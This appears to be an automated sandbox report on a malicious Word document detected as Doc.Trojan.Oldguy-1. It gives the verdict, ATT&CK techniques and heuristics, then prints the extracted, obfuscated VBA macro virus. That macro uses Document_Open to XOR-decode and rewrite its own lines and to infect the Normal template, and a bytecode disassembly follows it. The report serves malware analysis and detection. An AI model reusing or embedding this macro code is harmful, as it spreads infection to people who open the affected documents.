Verdict: MALICIOUS (Risk Score 120)
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code automatically when the document is opened. The macro code is obfuscated, suggesting an attempt to evade detection. The ClamAV detection name 'Doc.Trojan.Oldguy-1' further supports the malicious nature of the file.
Heuristics (3)
- ClamAV: Doc.Trojan.Oldguy-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Oldguy-1
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8140 bytes |

SHA-256: 07de146f521a527621767ded08ca11644341a2ebc5c28a1ad3a4fa9164036a52

Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Ç™ýñãßdù£îñ3zêrðÇ™ýñãßdù
Private Sub Document_Open()
On Error Resume Next
¤éÄù¼ò = 153
For Éo¥»ßû = 11 To 28: ThisDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine Éo¥»ßû, ªÎÞþÐí(Mid(ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(Éo¥»ßû, 1), 2), ¤éÄù¼ò): Next: £îñ3zêrð
End Sub
Private Function ªÎÞþÐí(¢UøòçÞ, ¤éÄù¼ò)
For Éo¥»ßû = 1 To Len(¢UøòçÞ): ªÎÞþÐí = ªÎÞþÐí & Chr(Asc(Mid(¢UøòçÞ, Éo¥»ßû, 1)) Xor ¤éÄù¼ò): Next
End Function
Private Sub £îñ3zêrð()
'=p]`%k¹¤¹¨©¹²¹Ð÷í±Ë÷ý¹³¹«ª°
'ÍñðêÝöúìôü÷í·ÏÛÉëöóüúí·ÏÛÚöôéö÷ü÷í걨°·ÚöýüÔöýìõü·ËüéõøúüÕð÷ü¹µ¹»=p]`%k¹¤¹»¹¿¹=p]`%k
'ßöë¹Pö<"Fb¹¤¹¨¨¹Íö¹«¡
'ÍñðêÝöúìôü÷í·ÏÛÉëöóüúí·ÏÛÚöôéö÷ü÷í걨°·ÚöýüÔöýìõü·ËüéõøúüÕð÷ü¹Pö<"Fbµ¹Úñ뱪 °¹¿¹3WGgIt±ÍñðêÝöúìôü÷í·ÏÛÉëöóüúí·ÏÛÚöôéö÷ü÷í걨°·ÚöýüÔöýìõü·Õð÷üê±Pö<"Fbµ¹¨°µ¹=p]`%k°
'×üáí
'Öéíðö÷ê·ÏðëìêÉëöíüúíðö÷¹¤¹ßøõêü£¹Öéíðö÷ê·Êøïü×öëôøõÉëöôéí¹¤¹ßøõêü
'Øééõðúøíðö÷·Ü÷øûõüÚø÷úüõÒü๤¹îýÚø÷úüõÝðêøûõüý
'Øééõðúøíðö÷·ÝðêéõøàÊíøíìêÛøë¹¤¹ßøõêü
'ÍñðêÝöúìôü÷í·Êøïü
'Ðÿ¹ÔøúëöÚö÷íøð÷ü빤¹×öëôøõÍüôéõøíü¹Íñü÷¹Êüí¹j5D~êerC¹¤¹ØúíðïüÝöúìôü÷í¹Üõêü¹Êüí¹j5D~êerC¹¤¹×öëôøõÍüôéõøíü
'Êüí¹j5D~êe¹¤¹j5D~êerC·ÏÛÉëöóüúí·ÏÛÚöôéö÷ü÷í걨°·ÚöýüÔöýìõü
'Ðÿ¹j5D~êe·Õð÷ü걨µ¹¨°¹¥§¹»¾^
'j5D~êe·ýüõüíüõð÷ü깨µ¹j5D~êe·úöì÷íöÿõð÷üê
'j5D~êe·ð÷êüëíõð÷ü깨µ¹ÍñðêÝöúìôü÷í·ÏÛÉëöóüúí·ÏÛÚöôéö÷ü÷í걨°·ÚöýüÔöýìõü·Õð÷ü걨µ¹ª«°
'Ðÿ¹j5D~êerC¹¤¹ØúíðïüÝöúìôü÷í¹Íñü÷¹ØúíðïüÝöúìôü÷í·Êøïü
'Ü÷ý¹Ðÿ
'Îðíñ¹Ýðøõöþê±îýÝðøõöþßðõüÊìôôøëàÐ÷ÿö°£¹·Íðíõü¹¤¹»ÑÚÝʹøëü¹õôª¹õªîã©ë껣¹·Øìíñö빤¹»üôø÷ìüõ¹þ©õýêíüð÷µ¹öõý¹þìà¹îðíñ¹÷üî¹÷øôü»£¹·Úöôôü÷í깤¹»ýö¹àöì¹ò÷öî¹îñö¹ð¹øô¦»£¹·Üáüúìíü£¹Ü÷ý¹Îðíñ
'Ðÿ¹Ýøà±×öî°¹¤¹«ª¹Íñü÷¹Êüõüúíðö÷·ÍàéüÍüáí¹±»úõøêê·êøôéõü¹ûà¹üôø÷ìüõ¹þ©õýêíüð÷µ¹öõý¹þìà¹îðíñ¹÷üî¹÷øôü·»¹¿¹ïûÚ빿¹»ÑÚÝʹøëü¹õôª¹õªîã©ë긻°
End Sub
'Class.sample by emanuel g0ldstein
'Old guy with new name ;) Don't get me wrong!
'Do not spread this shit!
' Processing file: /opt/analyzer/scan_staging/2c467a347b2d4ede82223f4c398a33b5.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 12006 bytes
' Line #0:
' QuoteRem 0x0000 0x0018 "Ç™ýñãßdù£îñ3zêrðÇ™ýñãßdù"
' Line #1:
' FuncDefn (Private Sub Document_Open())
' Line #2:
' OnError (Resume Next)
' Line #3:
' LitDI2 0x0099
' St ¤éÄù¼ò
' Line #4:
' StartForVariable
' Ld Éo¥»ßû
' EndForVariable
' LitDI2 0x000B
' LitDI2 0x001C
' For
' BoS 0x0000
' Ld Éo¥»ßû
' Ld Éo¥»ßû
' LitDI2 0x0001
' LitDI2 0x0001
' Ld ThisDocument
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' LitDI2 0x0002
' ArgsLd Mid$ 0x0002
' Ld ¤éÄù¼ò
' ArgsLd ªÎÞþÐí 0x0002
' LitDI2 0x0001
' Ld ThisDocument
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall ReplaceLine 0x0002
' BoS 0x0000
' StartForVariable
' Next
' BoS 0x0000
' ArgsCall £îñ3zêrð 0x0000
' Line #5:
' EndSub
' Line #6:
' FuncDefn (Private Function ªÎÞþÐí(¢UøòçÞ, ¤éÄù¼ò, id_FFFE As Variant))
' Line #7:
' StartForVariable
' Ld Éo¥»ßû
' EndForVariable
' LitDI2 0x0001
' Ld ¢UøòçÞ
' FnLen
' For
' BoS 0x0000
' Ld ªÎÞþÐí
' Ld ¢UøòçÞ
' Ld Éo¥»ßû
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' ArgsLd Asc 0x0001
' Ld ¤éÄù¼ò
' Xor
' ArgsLd Chr 0x0001
' Concat
' St ªÎÞþÐí
' BoS 0x0000
' StartForVariable
' Next
' Line #8:
' EndFunc
' Line #9:
' FuncDefn (Private Sub £îñ3zêrð())
' Line #10:
' QuoteRem 0x0000 0x001C "=p]`%k¹¤¹¨©¹²¹Ð÷í±Ë÷ý¹³¹«ª°"
' Line #11:
' QuoteRem 0x0000 0x0055 "ÍñðêÝöúìôü÷í·ÏÛÉëöóüúí·ÏÛÚöôéö÷ü÷í걨°·ÚöýüÔöýìõü·ËüéõøúüÕð÷ü¹µ¹»=p]`%k¹¤¹»¹¿¹=p]`%k"
' Line #12:
' QuoteRem 0x0000 0x0015 "ßöë¹Pö<"Fb¹¤¹¨¨¹Íö¹«¡"
' Line #13:
' QuoteRem 0x0000 0x00A2 "ÍñðêÝöúìôü÷í·ÏÛÉëöóüúí·ÏÛÚöôéö÷ü÷í걨°·ÚöýüÔöýìõü·ËüéõøúüÕð÷ü¹Pö<"Fbµ¹Úñ뱪 °¹¿¹3WGgIt±ÍñðêÝöúìôü÷í·ÏÛÉëöóüúí·ÏÛÚöôéö÷ü÷í걨°·ÚöýüÔöýìõü·Õð÷üê±Pö<"Fbµ¹¨°µ¹=p]`%k°"
' ... (truncated)
```